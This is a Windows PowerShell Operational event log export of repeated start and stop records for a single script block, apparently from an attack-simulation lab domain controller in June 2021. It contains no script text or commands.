OpCode=On create calls
RecordNumber=1474293
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474292
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474291
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474290
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474289
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474288
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474287
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474286
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474285
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474284
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474283
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474282
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474281
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474280
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474279
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474278
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474277
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474276
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474275
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474274
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474273
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474272
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474271
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474270
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474269
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474268
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474267
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474266
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474265
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474264
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474263
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474262
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474261
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474260
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474259
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474258
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474257
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474256
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474255
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474254
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474253
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474252
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474251
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474250
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474249
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474248
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474247
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474246
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474245
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474244
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474243
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474242
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474241
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474240
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474239
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
